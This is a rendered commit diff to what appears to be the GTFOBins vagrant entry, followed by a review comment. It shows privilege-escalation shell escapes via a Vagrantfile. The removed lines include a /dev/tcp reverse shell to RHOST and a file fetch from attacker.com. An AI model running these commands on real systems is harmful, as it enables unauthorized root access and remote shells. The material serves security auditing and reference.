Simplify vagrant

Andrea Cardaci 2023-04-13 08:34:09 +02:00 committed by GitHub
parent e05b154647
commit f121dff1cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -1,30 +1,20 @@
--- ---
description: | description: This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
Vagrant can execute arbitrary ruby code when starting up. The Commands down below create a new directory "pwn" in the tmp-folder where vagrant then is initialized. After that the command is pasted into the Vagrantfile and executed.
More Info at https://gtfobins.github.io/gtfobins/ruby/
functions: functions:
shell: shell:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && vagrant up - code: |
- cd $(mktemp -d)
echo 'exec "/bin/sh"' > Vagrantfile
vagrant up
sudo: sudo:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "/bin/sh"' > Vagrantfile && sudo vagrant up - code: |
reverse-shell: cd $(mktemp -d)
- description: | echo 'exec "/bin/sh"' > Vagrantfile
Run `nc -lvnp RPORT` on the attacker box. vagrant up
Replace RHOST and RPORT with the attacker ip and port to gain a reverse shell. suid:
code: | - code: |
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'exec "sh -i &>/dev/tcp/RHOST/RPORT <&1"' > Vagrantfile && vagrant up cd $(mktemp -d)
file-write: echo 'exec "/bin/sh -p"' > Vagrantfile
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' > Vagrantfile && vagrant up vagrant up
file-read:
- code: mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'puts File.read("file_to_read")' > Vagrantfile && vagrant up
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
mkdir /tmp/pwn && cd /tmp/pwn && vagrant init && echo 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])' > Vagrantfile && vagrant up
--- ---
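Review bot: The new one-line `description` drops the only sentence that explained the mechanism, namely that Vagrant runs the Vagrantfile as Ruby code when it starts up. Without it, a reader auditing a sudoers rule or a SUID bit on `vagrant` cannot tell from this entry why that grant amounts to handing out a Ruby interpreter. I would keep one sentence of that explanation ahead of the link, for example `Vagrant evaluates the Vagrantfile in the current directory as Ruby code on startup, so the functions of the ruby entry apply.` Separately, as rendered here the new `sudo` entry ends in a plain `vagrant up` and reads the same as the `shell` entry, while the removed line ran the command under `sudo`. That may be a rendering artefact of this page, so it is worth confirming that the two entries are meant to be identical.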